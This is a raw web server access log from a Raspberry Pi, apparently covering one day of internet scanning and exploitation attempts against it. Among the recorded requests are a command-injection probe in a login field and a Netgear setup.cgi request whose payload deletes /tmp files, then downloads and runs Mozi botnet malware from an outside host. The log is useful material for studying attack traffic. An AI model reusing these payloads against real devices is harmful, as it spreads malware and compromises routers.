Sat May 9 06:25:08 MDT 2020 06:25:08 up 74 days, 10:53, 1 user, load average: 0.28, 0.24, 0.26 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 74days 1:27m 2.81s /usr/bin/lxsession -s LXDE-pi -e LXDE 41.216.186.89 - - [09/May/2020:12:32:02 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 220.133.80.63 - - [09/May/2020:13:50:25 +0000] "GET /operator/basic.shtml?id=1337 HTTP/1.1" 404 0 "" "Abcd" 220.133.80.63 - - [09/May/2020:13:50:57 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 220.133.80.63 - - [09/May/2020:13:50:57 +0000] "GET /operator/basic.shtml?id=1337 HTTP/1.1" 404 0 "" "Abcd" 220.133.80.63 - - [09/May/2020:13:50:57 +0000] "POST /doLogin HTTP/1.1" 404 0 "" "Abcd" 220.133.80.63 - - [09/May/2020:13:50:58 +0000] "POST /doLogin HTTP/1.1" 404 0 "" "Abcd" 220.133.80.63 - - [09/May/2020:13:50:58 +0000] "GET /setup.cgi HTTP/1.1" 400 0 "" "" 220.133.80.63 - - [09/May/2020:13:51:29 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 220.133.80.63 - - [09/May/2020:13:51:29 +0000] "GET / HTTP/1.1" 400 0 "" "" 220.133.80.63 - - [09/May/2020:13:51:29 +0000] "GET / HTTP/1.1" 400 0 "" "" 220.133.80.63 - - [09/May/2020:13:51:30 +0000] "POST /doLogin HTTP/1.1" 404 0 "" "Abcd" 123.206.118.216 - - [09/May/2020:13:54:36 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 171.239.194.143 - - [09/May/2020:13:55:25 +0000] "POST /doLogin HTTP/1.1" 404 0 "" "Abcd" 171.239.194.143 - - [09/May/2020:13:55:26 +0000] "GET /sess-bin/login_session.cgi HTTP/1.1" 400 0 "" "" 171.239.194.143 - - [09/May/2020:13:55:26 +0000] "GET /operator/basic.shtml?id=1337 HTTP/1.1" 404 0 "" "Abcd" 171.239.194.143 - - [09/May/2020:13:55:27 +0000] "GET /operator/basic.shtml?id=1337 HTTP/1.1" 404 0 "" "Abcd" 171.239.194.143 - - [09/May/2020:13:55:27 +0000] "POST /doLogin HTTP/1.1" 404 0 "" "Abcd" 171.239.194.143 - - [09/May/2020:13:55:28 +0000] "GET /shell?/bin/busybox+ABCD HTTP/1.1" 400 0 "" "Abcd" 171.239.194.143 - - [09/May/2020:13:55:28 +0000] "GET /sess-bin/login_session.cgi HTTP/1.1" 400 0 "" "" 171.239.194.143 - - [09/May/2020:13:55:29 +0000] "GET /shell?/bin/busybox+ABCD HTTP/1.1" 400 0 "" "Abcd" 171.239.194.143 - - [09/May/2020:13:55:29 +0000] "POST /doLogin HTTP/1.1" 404 0 "" "Abcd" 171.239.194.143 - - [09/May/2020:13:55:30 +0000] "POST /doLogin HTTP/1.1" 404 0 "" "Abcd" 14.169.210.164 - - [09/May/2020:15:06:12 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 14.169.210.164 - - [09/May/2020:15:06:12 +0000] "GET /operator/basic.shtml?id=1337 HTTP/1.1" 404 0 "" "Abcd" 14.169.210.164 - - [09/May/2020:15:06:45 +0000] "GET / HTTP/1.1" 400 0 "" "" 14.169.210.164 - - [09/May/2020:15:06:45 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 14.169.210.164 - - [09/May/2020:15:06:45 +0000] "GET /operator/basic.shtml?id=1337 HTTP/1.1" 404 0 "" "Abcd" 14.169.210.164 - - [09/May/2020:15:06:46 +0000] "GET /shell?/bin/busybox+ABCD HTTP/1.1" 400 0 "" "Abcd" 14.169.210.164 - - [09/May/2020:15:06:46 +0000] "GET /shell?/bin/busybox+ABCD HTTP/1.1" 400 0 "" "Abcd" 14.169.210.164 - - [09/May/2020:15:06:47 +0000] "POST /doLogin HTTP/1.1" 404 0 "" "Abcd" 14.169.210.164 - - [09/May/2020:15:07:19 +0000] "GET /sess-bin/login_session.cgi HTTP/1.1" 400 0 "" "" 14.169.210.164 - - [09/May/2020:15:07:20 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.243.137.21 - - [09/May/2020:16:02:26 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 129.28.92.138 - - [09/May/2020:16:21:53 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 217.61.136.64 - - [09/May/2020:16:22:02 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 171.239.163.106 - - [09/May/2020:16:36:53 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 171.239.163.106 - - [09/May/2020:16:36:54 +0000] "GET /shell?/bin/busybox+ABCD HTTP/1.1" 400 0 "" "Abcd" 171.239.163.106 - - [09/May/2020:16:36:55 +0000] "GET /shell?/bin/busybox+ABCD HTTP/1.1" 400 0 "" "Abcd" 171.239.163.106 - - [09/May/2020:16:37:06 +0000] "GET /operator/basic.shtml?id=1337 HTTP/1.1" 404 0 "" "Abcd" 171.239.163.106 - - [09/May/2020:16:37:11 +0000] "GET /setup.cgi HTTP/1.1" 400 0 "" "" 171.239.163.106 - - [09/May/2020:16:37:13 +0000] "GET / HTTP/1.1" 400 0 "" "" 171.239.163.106 - - [09/May/2020:16:37:44 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 171.239.163.106 - - [09/May/2020:16:37:46 +0000] "GET /operator/basic.shtml?id=1337 HTTP/1.1" 404 0 "" "Abcd" 171.239.163.106 - - [09/May/2020:16:37:47 +0000] "POST /doLogin HTTP/1.1" 404 0 "" "Abcd" 171.239.163.106 - - [09/May/2020:16:37:47 +0000] "GET / HTTP/1.1" 400 0 "" "" 91.221.102.54 - - [09/May/2020:16:58:44 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 185.19.78.160 - - [09/May/2020:17:05:38 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0" 185.19.78.160 - - [09/May/2020:17:05:39 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 193.42.99.162 - - [09/May/2020:17:31:10 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 193.42.99.162 - - [09/May/2020:17:31:10 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 31.148.174.205 - - [09/May/2020:17:59:08 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 77.164.157.171 - - [09/May/2020:18:05:10 +0000] "GET / HTTP/1.1" 400 0 "" "" 139.162.106.181 - - [09/May/2020:21:02:35 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 14.247.186.143 - - [09/May/2020:21:21:17 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 14.247.186.143 - - [09/May/2020:21:21:17 +0000] "GET / HTTP/1.1" 400 0 "" "" 14.247.186.143 - - [09/May/2020:21:21:20 +0000] "GET /setup.cgi HTTP/1.1" 400 0 "" "" 14.247.186.143 - - [09/May/2020:21:21:21 +0000] "GET / HTTP/1.1" 400 0 "" "" 14.247.186.143 - - [09/May/2020:21:21:22 +0000] "GET / HTTP/1.1" 400 0 "" "" 14.247.186.143 - - [09/May/2020:21:21:23 +0000] "GET /operator/basic.shtml?id=1337 HTTP/1.1" 404 0 "" "Abcd" 14.247.186.143 - - [09/May/2020:21:21:24 +0000] "GET /sess-bin/login_session.cgi HTTP/1.1" 400 0 "" "" 14.247.186.143 - - [09/May/2020:21:21:25 +0000] "GET / HTTP/1.1" 400 0 "" "" 14.247.186.143 - - [09/May/2020:21:21:27 +0000] "GET /sess-bin/login_session.cgi HTTP/1.1" 400 0 "" "" 14.247.186.143 - - [09/May/2020:21:21:27 +0000] "GET /shell?/bin/busybox+ABCD HTTP/1.1" 400 0 "" "Abcd" 175.158.44.83 - - [09/May/2020:22:18:55 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0" 175.158.44.83 - - [09/May/2020:22:18:59 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.188.206.50 - - [09/May/2020:23:04:52 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 172.104.108.109 - - [09/May/2020:23:12:50 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0" 165.227.93.82 - - [09/May/2020:23:24:10 +0000] "GET / HTTP/1.1" 200 25000 "" "PycURL/7.43.0.2 libcurl/7.64.0 GnuTLS/3.6.7 zlib/1.2.11 libidn2/2.0.5 libpsl/0.20.2 (+libidn2/2.0.5) libssh2/1.8.0 nghttp2/1.36.0 librtmp/2.3" 217.29.222.56 - - [09/May/2020:23:32:24 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 217.29.222.56 - - [09/May/2020:23:32:24 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 79.215.156.69 - - [09/May/2020:23:39:01 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 139.9.200.66 - - [09/May/2020:23:44:21 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 103.55.139.196 - - [09/May/2020:23:49:38 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 47.89.192.12 - - [10/May/2020:00:28:41 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 193.42.99.162 - - [10/May/2020:00:33:40 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 193.42.99.162 - - [10/May/2020:00:33:40 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 154.8.204.200 - - [10/May/2020:01:36:36 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 154.8.204.200 - - [10/May/2020:01:36:36 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 154.8.204.200 - - [10/May/2020:01:36:37 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 154.8.204.200 - - [10/May/2020:01:36:37 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 154.8.204.200 - - [10/May/2020:01:36:41 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 154.8.204.200 - - [10/May/2020:01:36:41 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 154.8.204.200 - - [10/May/2020:01:36:42 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 154.8.204.200 - - [10/May/2020:01:36:42 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 154.8.204.200 - - [10/May/2020:01:36:43 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 212.66.122.92 - - [10/May/2020:01:42:00 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 193.42.99.162 - - [10/May/2020:01:57:27 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 193.42.99.162 - - [10/May/2020:01:57:27 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 139.59.182.101 - - [10/May/2020:02:01:18 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 82.54.126.133 - - [10/May/2020:03:04:10 +0000] "GET / HTTP/1.1" 400 0 "" "" 5.167.161.213 - - [10/May/2020:03:12:42 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 80.41.191.231 - - [10/May/2020:03:28:42 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 80.41.191.231 - - [10/May/2020:03:28:42 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 72.143.30.218 - - [10/May/2020:03:37:38 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 72.143.30.218 - - [10/May/2020:03:38:38 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 212.83.171.224 - - [10/May/2020:03:55:15 +0000] "GET / HTTP/1.1" 200 25000 "" "" 86.58.116.43 - - [10/May/2020:03:57:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 133.232.87.13 - - [10/May/2020:03:58:49 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0" 133.232.87.13 - - [10/May/2020:03:58:52 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 111.42.66.21 - - [10/May/2020:03:59:52 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://111.42.66.21:49938/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 0 "" "" 103.121.57.130 - - [10/May/2020:04:13:23 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 117.157.15.27 - - [10/May/2020:04:41:28 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 117.157.15.27 - - [10/May/2020:04:41:32 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 190.140.104.67 - - [10/May/2020:05:09:23 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 190.140.104.67 - - [10/May/2020:05:09:24 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 101.109.204.12 - - [10/May/2020:05:33:31 +0000] "GET / HTTP/1.1" 400 0 "" "" 162.243.141.50 - - [10/May/2020:06:18:37 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 184.105.143.20 - - [10/May/2020:06:26:10 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 121.223.8.201 - - [10/May/2020:06:45:05 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 121.223.8.201 - - [10/May/2020:06:45:05 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 27.105.70.128 - - [10/May/2020:06:46:05 +0000] "GET / HTTP/1.1" 400 0 "" "" 178.128.222.196 - - [10/May/2020:07:36:29 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 35.183.221.5 - - [10/May/2020:08:48:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0" 97.76.134.66 - - [10/May/2020:09:49:55 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 97.76.134.66 - - [10/May/2020:09:49:56 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 97.76.134.66 - - [10/May/2020:09:50:10 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 27.223.28.74 - - [10/May/2020:10:17:20 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 90.188.118.168 - - [10/May/2020:10:48:44 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 193.42.99.162 - - [10/May/2020:11:58:16 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 193.42.99.162 - - [10/May/2020:11:58:16 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" Sun May 10 06:25:13 MDT 2020 06:25:13 up 75 days, 10:53, 1 user, load average: 0.63, 0.34, 0.29 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 75days 1:28m 2.81s /usr/bin/lxsession -s LXDE-pi -e LXDE